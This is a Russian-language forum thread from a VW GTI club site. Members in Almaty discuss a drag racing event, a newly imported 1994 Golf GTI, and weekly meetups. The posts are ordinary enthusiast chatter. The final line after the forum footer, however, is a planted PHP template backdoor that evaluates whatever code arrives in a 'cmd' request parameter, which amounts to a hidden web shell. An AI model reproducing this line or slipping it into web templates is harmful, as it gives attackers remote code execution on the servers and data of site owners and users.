+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 26

Тема: Гольф Клуб Алматы


Комбинированный просмотр

  1. #1
    GTI-Racing Neza is on a distinguished road Аватар для Neza
    Регистрация
    19.08.2006
    Откуда
    Алматы, Казахстан
    Машина
    Golf Mk3 & Jetta Mk1
    Сообщений
    218
    В этой теме буду отписываться за все наши двиги... благо есть хороший повод. сегодня был очередной клубный полигон Almaty Drag Racing Club-a.
    Вот там и была малая часть нашего Гольф клуба.


    вотки смотреть тут....



    ну а это описание поездки:

    много потеряли все те кто не поехал! Гольф клуб там жжег аки аццкий сатона... конечно массовости не вышло, но все же может тоже... короче красиво приехали, красиво стояли в парке участников. + там познакомился с Вовчегом, у него вроде как 1.6, мотор. но комплектация GT. т.е. дисковые задние тормоза, комп, сидения спортивные ну и пластиковый обвес. ну короче стандартный набор. кстати у него стоит отличная саунд система!!!! и зализана крышка багажника.... фотки машины, смотри по ссылочке.
    далее! встретил на драге чувачка с которым ходил когда-то в тренажерный зал, зовут Никита. там не общались, а на драге познакомились. так у него окацца тоже GT, гольф 3!!!! рассказал ему про гольф клуб, и подтянул в четверг на гольпи сбор... так что если все будет хорошо, тогда на след сборе мы увидем Чагатая, Вовчега и Никиту!!!! вот.

    по гонкам.... доехали зачотно. Гольф ВР6 умудрился раскочегарить свой аппарат до 200 км в час (камикадзенах). в принципе это было самое выдающееся за поездку.... доехали без приключений. кстати Серегу зажал грузовик (фура), со стороны это выглядело ужасно!!!! очень опасный момент был. по пришествию. оба представителя гольф клуба прошли квалификацию.... но из-за ограниченного кол-ва участников 3-го класса, участвовал лишь Ант в виду более меньшего времени, он быстрее Сереги на 1 сек. Ант-а поставили с М3.... (ужостнах), ну и естессно победитель был уже известен. даже можно было не стартовать
    победителем полигона стал Скайлаин в 33-м кузове. с ним билась в финале импреза с номерами 005. купе.


    рассказывать как мы все афигенно пообщались, потусили, пили пиво, ели мясо - не буду. а то завидовать будете.

  2. #2
    GTI-Racing Neza is on a distinguished road Аватар для Neza
    Регистрация
    19.08.2006
    Откуда
    Алматы, Казахстан
    Машина
    Golf Mk3 & Jetta Mk1
    Сообщений
    218
    кстати по вышеуказанной ссылочке вы можете увидеть Гольф 2 GTI со стайлингом. капот, крышка багажника.... и т.д.

    а еще принимаю с завтрашнего дня поздравления. Наконец-таки забираю свою красавицу с СВХ (склад временного хранения). фотки выложу завтра....

  3. #3
    GTI-Racing Neza is on a distinguished road Аватар для Neza
    Регистрация
    19.08.2006
    Откуда
    Алматы, Казахстан
    Машина
    Golf Mk3 & Jetta Mk1
    Сообщений
    218
    Что-то 28 просмотров, и ниодного ответа. Неужели никому не интересно...

  4. #4
    Администратор 3BEPb is on a distinguished road Аватар для 3BEPb
    Регистрация
    03.03.2006
    Машина
    Audi A4
    Сообщений
    1,731
    Поздравляем! фотки обязательно дома посмотрю!
    ждём дальнейших отчётов и побольше фоток!))
    ЗЫ наш ВР6ак разогнался до 235 ;) но потом жестоко сломался

  5. #5
    GTI-Racing Neza is on a distinguished road Аватар для Neza
    Регистрация
    19.08.2006
    Откуда
    Алматы, Казахстан
    Машина
    Golf Mk3 & Jetta Mk1
    Сообщений
    218
    Давай-давай... посмотри, и обязательно отпишись!
    Фотки будут, у нас сборы каждый четверг. и постоянно новые люди появляются. щас вот собираемся сайт запускать. пока что он в разаработке, но деньги на домен и хостинг уже собрали. вот.

    а этот что 200 раскочегарил... я ехал за ним, и видел как у него под днищем синий дым поваливал нет-нет... осмотр подкапотного пространства показал что масло давит из под датчика скорости на АКПП. оно попадало на коллектор - вот вам и синеватый дым. вроде бы и все...

    кстати вот видео со вчерашнего драга... 3.7 метра. качество - с сотки

    http://www.sendspace.com/file/syr7l1

  6. #6
    Мимо проходил Trojan is on a distinguished road Аватар для Trojan
    Регистрация
    06.08.2006
    Сообщений
    79
    Neza зачОт,кстати ГТИ клаб.ру отличнаю поддержка =) Тут есть один хорошы и зачотны чел Морг вот он всегда чем смогает помогает.Морг респект йопт! ыыы...

    Вобщем как сделаем сайт позовем,зацените.^^

  7. #7
    GTI-Racing Neza is on a distinguished road Аватар для Neza
    Регистрация
    19.08.2006
    Откуда
    Алматы, Казахстан
    Машина
    Golf Mk3 & Jetta Mk1
    Сообщений
    218
    Троян, давай тут флудить не будем. а по делу писать. флудить и у нас можно....

  8. #8
    GTI-Racing Neza is on a distinguished road Аватар для Neza
    Регистрация
    19.08.2006
    Откуда
    Алматы, Казахстан
    Машина
    Golf Mk3 & Jetta Mk1
    Сообщений
    218
    Завтра начну заливать наши клубные машины... и машинки нашего города.

    А пока... вот мой предыдущий гольф, тот самый что ВР6 и на автомате. 1995 год, полный фарш. смотрим фото и любуемся...



  9. #9
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    2Neza врш на автомате? незачОт имхо...и до двухсот врш не "раскочегарить"...а просто быстренько разогнать,имееца куча свидетелей что врш до 200мигом разгоняецца...причем 200 это конец 4передачи...воть...
    и что значит полный фарш? валы?впуск?выпуск?блок.диффа?...поподробнее пжлста
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  10. #10
    GTI-Racing Neza is on a distinguished road Аватар для Neza
    Регистрация
    19.08.2006
    Откуда
    Алматы, Казахстан
    Машина
    Golf Mk3 & Jetta Mk1
    Сообщений
    218
    2 Сатурн... знаю что ВР6 на механике не зачот. посему продал его. а полный фарш, это я имел в виду салон. комплектацию... все было кроме кондера. да и кузов идеал... зазоры ровненькие. красивенький такой был. но это в прошлом. щас я внес залог за эту машинку, че-то у фирмы что мне привезла её, какие-то проблемы с гаи, и они не могут забрать доки. хотя машину уже как 2 недели сняли с вагона... расскажу про машину: ГТИ 16в, двиг я думаю полный сток, т.к. покупал на аукционе из японии. год 1994, пробег 76 000. по деньгим встает в 6500. у нас таможня на эту машину всего 1000 баксов. кпп - естессно мех!

    потихоньку буду тюнить.... кстати не мог бы огласить что можно сделать с этим аппаратегом? ну и цены примерные.... а вот и фото:



+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Привет С Долёкого Казахстана. Г Алматы
    от Vel в разделе Welcome to GTI-CLUB
    Ответов: 19
    Последнее сообщение: 10.04.2024, 19:52
  2. Встреча Гольф-клуб 12.12.08 20-00 Караван
    от Serzh в разделе Встречи и мероприятия
    Ответов: 23
    Последнее сообщение: 08.01.2024, 16:46
  3. Ответов: 20
    Последнее сообщение: 01.01.2024, 19:43
  4. Привет из Алматы
    от VITAMIN 313 в разделе Welcome to GTI-CLUB
    Ответов: 11
    Последнее сообщение: 02.10.2023, 23:36
  5. Просьба С Алматы
    от Nurike в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 2
    Последнее сообщение: 26.01.2009, 15:48

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}